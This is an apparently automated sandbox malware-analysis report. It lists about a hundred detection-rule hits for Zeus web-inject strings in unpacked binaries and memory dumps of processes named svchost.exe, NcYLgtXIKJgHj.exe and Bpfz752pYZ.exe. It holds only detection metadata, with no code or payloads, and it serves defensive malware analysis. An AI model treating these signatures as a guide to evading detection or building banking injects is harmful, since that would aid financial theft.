Source: 2.3.svchost.exe.2d30000.52.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.60.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 16.2.NcYLgtXIKJgHj.exe.2792000.1.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.27.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.18.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.54.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 14.2.NcYLgtXIKJgHj.exe.2ac0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.29a2000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.46.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.51.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.3.Bpfz752pYZ.exe.6f31c8.0.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 25.2.NcYLgtXIKJgHj.exe.2f50000.2.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.9.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.407000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.50.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.48.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.36.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 20.2.NcYLgtXIKJgHj.exe.2652000.1.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.881000.2.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.3.Bpfz752pYZ.exe.6f8dc8.2.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.2.svchost.exe.2c70000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 28.2.NcYLgtXIKJgHj.exe.2eb0000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.3.Bpfz752pYZ.exe.6f31c8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.58.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.11.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 16.2.NcYLgtXIKJgHj.exe.2a60000.2.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.886c00.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.7.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.64.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.55.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.44.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.49.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2a50000.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.69.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0.3.Bpfz752pYZ.exe.6f81c8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.ee00000.74.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.24.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 22.2.NcYLgtXIKJgHj.exe.2340000.2.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.68.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 7.2.NcYLgtXIKJgHj.exe.3100000.2.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 16.2.NcYLgtXIKJgHj.exe.2a60000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.60.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.68.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 36.2.NcYLgtXIKJgHj.exe.2202000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.886000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.886000.5.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.20.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2a50000.6.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.53.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 14.2.NcYLgtXIKJgHj.exe.2922000.1.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 7.2.NcYLgtXIKJgHj.exe.2fa2000.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.66.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 34.2.NcYLgtXIKJgHj.exe.2740000.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 31.2.NcYLgtXIKJgHj.exe.27f0000.2.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.47.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.20.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.42.raw.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 6.2.NcYLgtXIKJgHj.exe.1740000.2.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.2d30000.61.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 2.3.svchost.exe.886000.1.unpack, type: UNPACKEDPE	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000006.00000002.2562028304.0000000001740000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000007.00000002.2554723271.0000000002FA0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2644113860.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2710293683.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2651597551.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2640221225.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000002.3375821338.0000000000400000.00000040.00000001.01000000.00000004.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2551297845.000000000ED00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2491630816.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2681109856.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000014.00000002.2584784821.00000000027D0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000001F.00000002.2699028400.0000000002790000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2136779480.0000000000881000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2688837088.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2681703821.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2682799870.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2646845259.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000016.00000002.2606518078.00000000005E0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2693850041.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2694477664.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2610885248.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2667661376.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000001F.00000002.2699100650.00000000027F0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2711656555.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000000A.00000002.2576688656.0000000001520000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2689917423.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000000.00000003.2123232589.00000000006F3000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2689093667.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2642349690.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000010.00000002.2538477716.0000000002A60000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000019.00000002.2629072397.0000000002B90000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000016.00000002.2610943205.0000000002340000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000002.3391913803.0000000002CD1000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000000E.00000002.2558937111.0000000002920000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2617323227.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2674089655.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2584410332.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000010.00000002.2535763642.0000000002790000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000022.00000002.2697002323.0000000002740000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2139570153.0000000002A50000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2685802942.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2642126160.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2712084966.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2696066198.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2711910580.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2684054026.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000007.00000002.2555462875.0000000003100000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2672453488.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000006.00000002.2561383940.00000000016E0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2642540091.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000002.3391439892.00000000029A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000001C.00000002.2632299607.0000000002D10000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2683452927.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000014.00000002.2583716021.0000000002650000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2682237093.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2591770836.0000000005450000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2646105043.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000019.00000002.2643934604.0000000002F50000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2634522992.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2681497968.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2488750222.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2634738816.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2710792546.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000002.3391439892.00000000029F3000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2643292305.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2681300847.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2509383327.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2681891778.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2683874460.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2504620207.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000022.00000002.2695460193.0000000000BD0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2636504789.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2680873224.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2684684807.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2643045244.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 0000000A.00000002.2575020460.00000000014C0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000024.00000002.2645314223.00000000023A0000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2642865814.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000000.00000002.2127342577.0000000000400000.00000040.00000001.01000000.00000005.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2562478885.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2684438036.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000024.00000002.2645122457.0000000002200000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2712266421.000000000EE00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2671268394.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2684242011.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2650052400.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2689405360.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2643706755.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2682432522.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
Source: 00000002.00000003.2522638686.0000000002D30000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature. Author: unknown
